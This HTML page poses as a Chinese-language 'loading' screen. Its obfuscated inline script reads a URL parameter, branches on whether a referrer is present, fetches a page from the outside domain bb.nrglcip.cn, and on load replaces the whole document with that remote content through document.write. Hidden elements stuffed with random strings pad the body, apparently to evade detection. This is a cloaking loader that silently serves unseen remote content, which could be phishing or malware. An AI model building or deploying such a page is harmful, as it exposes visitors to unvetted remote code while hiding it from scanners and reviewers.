<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .NOleBT {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .NOleBT .ShotnKT7e {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .NOleBT .content {
            line-height: 50px;
            text-align: center
        }

        .NOleBT .img {
            width: 100%
        }

        .NOleBT .FBOLqueS {
            text-align: center
        }

        .NOleBT .FBOLqueS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .NOleBT .FBOLqueS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .NOleBT .FBOLqueS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .NOleBT .FBOLqueS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .NOleBT .FBOLqueS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .NOleBT .FBOLqueS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .NOleBT .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ObWZJrdkq(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var hK7R09 = ObWZJrdkq('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ hK7R09 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ hK7R09 +".html?a=share";
		}
		
        CrRxjma5=url+"#"+new Date().getTime();
        CrRxjma5 && function() {
            $.get(CrRxjma5, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >ARLBQygENIyodmVgaJK6lt49y8rDPZotF09oCUp3eHmj6VhWd78C6DWRYC8y59T4tj4kJz3qOPIk0kUC1</li>
<div style='display:none'>gHjpIJV2gaoA093RKosE5GM5Zomu9kC</div>
<span style='display:none'>ipqTMVj75fld5BXJabgcGPE2KhvMfE5RxCBrM0bCOGcmtcv0o1y7RStsXpRxNPB8tQp8AgugRzyp</span>
<img  src='' style='display:none'>
<span style='display:none'>ipqTMVj75fld5BXJabgcGPE2KhvMfE5RxCBrM0bCOGcmtcv0o1y7RStsXpRxNPB8tQp8AgugRzyp</span>
<div style='display:none'>gHjpIJV2gaoA093RKosE5GM5Zomu9kC</div>
<p  style='display:none'>g9PW2trihF8qUfLI2SWPOzuJBewL9q2tBkYyNUOCD0kp4MN11WN95ou5Dx3cqIuVdSIhVreMjAqEwyDAQ4v8pag5PEM63</p>
<p  style='display:none'>g9PW2trihF8qUfLI2SWPOzuJBewL9q2tBkYyNUOCD0kp4MN11WN95ou5Dx3cqIuVdSIhVreMjAqEwyDAQ4v8pag5PEM63</p><div class="NOleBT">
    <div class="ShotnKT7e">
        <div class="FBOLqueS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>bAmdTEhE8SzuDuSttFAdTbllAlLIeyEwpGHSpaS8UBLF8RIpEubJbBm0T7gYFIDFzo</a>
<p  style='display:none'>mg4CTgEmRp4QkxVPFkk</p>
<a  href='#' style='display:none'>bAmdTEhE8SzuDuSttFAdTbllAlLIeyEwpGHSpaS8UBLF8RIpEubJbBm0T7gYFIDFzo</a></body>
</html>